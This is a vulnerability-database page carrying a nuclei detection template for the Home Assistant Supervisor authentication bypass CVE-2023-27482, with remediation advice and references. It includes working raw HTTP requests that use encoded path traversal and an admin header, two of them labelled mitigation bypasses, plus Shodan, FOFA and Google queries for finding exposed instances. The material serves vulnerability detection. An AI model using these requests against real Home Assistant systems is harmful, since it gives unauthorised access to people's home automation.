Lucene search
K

Home Assistant Supervisor - Authentication Bypass

🗓️ 03 Jul 2026 03:01:05Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 32 Views

Home Assistant Supervisor authentication bypass vulnerability impacting versions 2023.01.1 and older. Mitigated in version 2023.03.

Related
Refs
Code
ReporterTitlePublishedViews
Family
AlpineLinux
CVE-2023-27482
8 Mar 202318:15
alpinelinux
Circl
CVE-2023-27482
8 Mar 202320:23
circl
CNNVD
Home Assistant 授权问题漏洞
8 Mar 202300:00
cnnvd
CVE
CVE-2023-27482
8 Mar 202300:00
cve
Cvelist
CVE-2023-27482
8 Mar 202300:00
cvelist
NVD
CVE-2023-27482
8 Mar 202318:15
nvd
OpenVAS
Home Assistant Authentication Bypass Vulnerability (May 2023) - Active Check
14 Jun 202300:00
openvas
OSV
CGA-62JF-HMMJ-87Q8
6 Jun 202412:23
osv
OSV
CGA-F7JW-FJ3M-6Q42
29 Jan 202600:46
osv
OSV
CVE-2023-27482
8 Mar 202300:00
osv
Rows per page
id: CVE-2023-27482

info:
  name: Home Assistant Supervisor - Authentication Bypass
  author: DhiyaneshDK
  severity: critical
  description: |
    Home Assistant Supervisor is an open source home automation tool. A remotely exploitable vulnerability bypassing authentication for accessing the Supervisor API through Home Assistant has been discovered.This impacts all Home Assistant installation types that use the Supervisor 2023.01.1 or older. Installation types, like Home Assistant Container (for example Docker), or Home Assistant Core manually in a Python environment, are not affected.
  impact: |
    An attacker can bypass authentication and gain unauthorized access to the Home Assistant Supervisor, potentially leading to further compromise of the system.
  remediation: |
    The issue has been mitigated and closed in Supervisor version 2023.03.1, which has been rolled out to all affected installations via the auto-update feature of the Supervisor. This rollout has been completed at the time of publication of this advisory. Home Assistant Core 2023.3.0 included mitigation for this vulnerability. Upgrading to at least that version is thus advised. In case one is not able to upgrade the Home Assistant Supervisor or the Home Assistant Core application at this time, it is advised to not expose your Home Assistant instance to the internet.
  reference:
    - https://www.elttam.com/blog/pwnassistant/
    - https://github.com/elttam/publications/blob/master/writeups/home-assistant/supervisor-authentication-bypass-advisory.md
    - https://www.home-assistant.io/blog/2023/03/08/supervisor-security-disclosure/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-27482
    - https://github.com/home-assistant/core/security/advisories/GHSA-2j8f-h4mr-qr25
    - https://xz.aliyun.com/t/12572
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2023-27482
    cwe-id: CWE-287
    epss-score: 0.71974
    epss-percentile: 0.99352
    cpe: cpe:2.3:a:home-assistant:home-assistant:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: home-assistant
    product: home-assistant
    shodan-query:
      - title:"Home Assistant"
      - http.title:"home assistant"
      - cpe:"cpe:2.3:a:home-assistant:home-assistant"
    fofa-query: title="home assistant"
    google-query: intitle:"home assistant"
  tags: cve2023,cve,homeassistant,auth-bypass,rce,home-assistant,vkev,vuln

http:
  - raw:
      - |
        GET /api/hassio/app/.%252e/supervisor/info HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /api/hassio/app/.%09./supervisor/info HTTP/1.1 # Mitigation bypass 1
        Host: {{Hostname}}
      - |
        GET /api/hassio_ingress/.%09./supervisor/info HTTP/1.1 # Mitigation bypass 2
        Host: {{Hostname}}
        X-Hass-Is-Admin:1

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"slug":'
          - '"name":'
          - '"ip_address"'
        condition: and

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d24992d5b949f75a1e2d27c556a3bd8953b280d424bef4029c257562352b08b20221008d59f392774f63b6eabb97a186072cd867c338d81e12c385f2a1b004305c7f31:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.110
EPSS0.71974
SSVC
32